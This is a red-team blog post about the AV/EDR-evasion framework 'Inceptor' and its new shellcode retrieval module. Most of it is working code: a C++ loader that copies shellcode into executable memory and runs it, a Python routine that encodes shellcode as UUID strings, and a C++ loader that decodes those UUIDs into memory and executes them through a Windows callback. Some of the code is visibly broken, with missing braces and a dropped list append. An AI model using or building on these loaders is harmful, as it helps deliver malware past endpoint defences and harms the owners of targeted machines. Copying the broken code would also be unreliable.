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Implementing Shellcode Retrieval

Recently, I developed a PoC AV/EDR Framework, called Inceptor. More information about the tool can be found in the repository itself, and in the accompanying blog post.

What is important to know, is that Inceptor is a tool which can help to automate the process of developing implants which can automatically bypass common AV and EDR solutions. By default, Inceptor embeds shellcode or PE (transformed into shellcode) within wrappers (or “templates”), which are designed to load and execute them. Templates are editable, but till now the shellcode was always embedded very crudely within the template, in the form of a byte array.

A very easy example is provided below:

// Shellcode embedded in the template
const unsigned char raw[] = "####SHELLCODE####";
int length = sizeof(raw);
// Allocate RWX space for the shellcode
VOID* mem = VirtualAlloc(NULL, length, 0x00002000 | 0x00001000, PAGE_EXECUTE_READWRITE);
bool success = false;
// Copy shellcode in memory 
success = memcpy(mem, raw, length);
// Function pointer to the start of the shellcode
int (*my_main)() = (int(*)()) ((ULONGLONG)mem);
// Execution

This example serves just as a PoC. As such, we are not considering issues as having a RWX region of memory, lack of error handling, direct use of Windows APIs (which can be hooked), etc.

The issue we are interested in, for the scope of this post, is having the shellcode embedded as a byte array. Indeed, having large binary blob can be suspicious if the program is statically reversed. In some cases, as with C# payloads, this can be really easily spotted, even with strong obfuscation in place.

Moreover, as observable in other researches, like Lazarus-Shellcode-Execution by NCC Group, some forms of injection may use a special format, requiring the binary blob to further transformed.

However, so far, the shellcode format couldn’t really be modified at all in Inceptor, which really limited the possibility of having other formats or retrieval mechanisms.

The Shellcode Retrieval Module

In Inceptor, a user could already add or extend the tool functionality by adding or modifying a template or a module. A module can be thought as a pluggable set of functionalities which can be added to a template. Modules themselves are based on templates, which can be adapted, changed, or added, to provide the maximum level of customisation.

Based on this model, I thought it could be nice and easy to implement the shellcode embedding process as a module itself. This is how it works:


As observable from the image, the logic is pretty simple. The IShellcodeRetrievalModule and ShellcodeRetrievalModule abstract classes act as the main interfaces for shellcode retrieval mechanisms. Actually, the ShellcodeRetrievalModule abstract class provides a genera logic for all modules which just performs operations on the shellcode, while the IShellcodeRetrievalModule abstract class provides an empty interface for all Shellcode retrieval mechanisms which are too specialised to be generalised.

Important to note that with this logic, at least a shellcode retrieval module needs to be loaded. If no SRM are detected, Inceptor will indeed load the BlobShellcodeRetrievalModule by default.

Every SRM module, by itself, wraps a function which returns the shellcode which needs to be loaded in memory. The function is compiled with the shellcode (or other mechanism) within a .lib file, along with a header file with the function declaration. The Library is then linked to the final payload. The function symbol is known at Linking time thanks to header previously generated.

Implementing UUID Shellcode Execute

Implemented the general SRM, it is possible to implement a specific shellcode retrieval mechanism. The first test case was indeed the UUID-ShellExecute. This kind of mechanism is ideal because it doesn’t change the general concept of shellcode embedding (the shellcode is indeed still embedded in the payload) but changes its format from a bytearray to a sequence of UUID strings.

As ShellcodeRetrievalModule already implements the logic behind the header creation and library compilation, the only thing needed to implement is the shellcode formatting. To do that, all ShellcodeRetrievalModule implementations must implement the craft() method.

We can borrow and adapt one of the Python implementations available on internet, such as the one by Boku7 or the one by ChoiSG.

The final implementation of craft would be the following:

def craft(self, shellcode, language) -> (str, list, str):
    Console.warn_line("[WARNING] This module is only supported by 'uuid' based templates")
    Console.warn_line("[WARNING] This module is not compatible with LD encoders")
    data = shellcode
    if isinstance(shellcode, str):
        data = unhexlify(shellcode)
    if len(data) % 16 != 0:
        padding = b"\x90" * (16 - (len(data) % 16))
        data += padding
    uuids = []
    for i in range(0, len(data), 16):
        uuid_string = str(uuid.UUID(bytes_le=data[i:i + 16]))
    self.uuids = ",\n".join(uuids)
    self.shellcode_length = len(uuids)
    if language == Language.POWERSHELL:
        raise ModuleNotCompatibleException

    if language == Language.CSHARP:
        return "string[]", [], self.uuids
    elif language == Language.CPP:
        return "char**", [], self.uuids

The return tuple would be the triple (return_type, [list of arguments], formatted_shellcode). Each of the unpacked values would be then used to modify a function template similar to the following:

####RETURN_TYPE#### myFunction(####ARGS####){
    char* uuids[] = {

Although arguments substitution is mainly still a work in progress and far from being stable, this substitution pattern has proven to offer good customization / stability tradeoff.

Finally, it’s necessary to implement a template supporting UUID-Shellcode Execution. For this task, we can easily borrow an existing implementation, as the C++ by NCC Group and the C# one by ChoiSG, which is using D/Invoke.

The final template would be similar to the following>

#include <Windows.h>
#include <Rpc.h>
#include <iostream>


#pragma comment(lib, "Rpcrt4.lib")

int main()


    char** uuids = ####SHELLCODE####;
    int elems = ####SHELLCODE_LENGTH####;

    VOID* ha = VirtualAlloc(NULL, 0x100000, 0x00002000 | 0x00001000, PAGE_EXECUTE_READWRITE);
    DWORD_PTR hptr = (DWORD_PTR)ha;

    for (int i = 0; i < elems; i++) {
        printf("[*] Allocating %d of %d uuids\n", i + 1, elems);
        printf("%s\n", *(uuids+i));
        RPC_CSTR rcp_cstr = (RPC_CSTR)*(uuids+i);
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)rcp_cstr, (UUID*)hptr);
        if (status != RPC_S_OK) {
            printf("[-] Something went wrong\n");
            return -1;
         hptr += 16;

    EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);
    return 0;

And finally testing it using the following command line:

python native tests\calc64.raw -o uuid-shellexec.exe -m uuid_shellcode_retrieval

And it worked!


Of course, this is just the start of the game. Now, that is possible to implement arbitrary methods to retrieve the shellcode, it’s a matter of time to come up with new, creative ways to hide and retrieve our code. In another post, I’ll cover how it’s possible to leverage the SRM interface to load payloads embedded as a local resource or ICON file (technique borrowed from Sektor7).



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